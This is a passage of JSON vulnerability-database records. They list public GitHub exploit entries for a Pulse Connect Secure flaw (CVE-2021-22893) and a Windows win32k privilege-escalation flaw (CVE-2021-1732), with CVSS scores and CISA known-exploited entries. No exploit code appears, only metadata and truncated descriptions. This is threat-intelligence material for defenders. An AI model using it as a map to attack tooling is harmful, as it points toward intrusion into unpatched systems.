CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "8DBBEAEC-C905-52CD-B95C-87663EA9C145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:57:25", "description": "# CVE-2021-22893\nPulse Connect...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T10:09:56", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-12-15T14:41:55", "id": "241CA368-5AF2-555C-91EE-5D10B229F97D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:59:30", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": 
"2022-08-17T19:20:50", "id": "51858F11-1259-5A40-82DF-DD7D62A7B11A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:28:09", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "7CEBB62C-173B-50CD-A252-B6522523EE57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:19:38", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "E90678A1-4183-5E58-A4E2-5E48E8767D92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T12:50:14", "description": "# CVE-2021-1732-Exploit\nCVE-2021-1...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T01:35:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-12-18T11:55:36", "id": "1D0AAF42-5E68-5985-A800-90937D55628D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:32:27", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T02:13:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-02-16T09:53:06", "id": "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-13T10:29:32", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T05:07:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-06-13T06:40:53", "id": "91A5BC48-2410-555B-B7FB-8138577D6B78", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:55:12", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T02:11:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-08-15T15:41:27", "id": "02C6FE13-5036-5BE5-8AC8-278A918BA581", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:37:09", "description": "# CVE-2021-1732\n\n- \u6f0f\u6d1e\u53d1\u751f\u5728Windows \u56fe\u5f62\u9a71\u52a8`win32kfull!NtUserCreateWind...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T01:28:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-11-08T01:36:42", "id": "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "href": "", "cvss": {"score": 4.6, "vector": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T16:12:24", "description": "<h1 style=\"font-size:10vw\" align=\"center\">Windows Privilege Esca...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T12:55:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-06-10T10:41:19", "id": "5E516DC2-BF71-57D0-9A87-3874146D0F83", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-09T08:09:06", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-09T07:14:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2023-03-09T07:15:31", "id": "87746757-7ADF-518B-8EA1-A11AC7E420FC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-09T08:27:55", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-01T13:06:17", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2023-03-09T07:13:06", "id": "237105AA-3579-5C91-BC0F-55BF93EC18DD", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-22893\nTHIS IS NOT A REAL EXPLOIT IT IS A HONEYPOC (ht...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T09:48:57", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350", "CVE-2021-22893"], "modified": "2022-02-07T18:34:52", "id": "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31955", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows NTFS Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows NTFS Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-09T23:10:03", 
"description": "Vulnerability to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Pulse Connect Secure Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22893", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Allows remote attackers to execute arbitrary code via a crafted document, aka \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office/WordPad Remote Code Execution Vulnerability with Windows API", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-0199", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Win32k Privilege Escalation Vulnerability. 
